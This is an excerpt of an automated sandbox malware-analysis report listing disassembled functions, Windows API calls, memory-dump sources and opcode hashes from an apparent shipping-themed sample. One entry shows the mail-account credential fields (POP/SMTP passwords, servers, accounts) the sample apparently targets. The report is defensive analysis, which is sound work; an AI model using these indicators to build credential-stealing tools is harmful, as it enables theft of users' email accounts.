                                                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID:
                                                • API String ID: 1174141254-0
                                                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: closesocket
                                                • String ID:
                                                • API String ID: 2781271927-0
                                                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                • VariantInit.OLEAUT32(?), ref: 00404414
                                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                                • VariantInit.OLEAUT32(?), ref: 00404431
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                • String ID:
                                                • API String ID: 1312198159-0
                                                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 0-2111798378
                                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%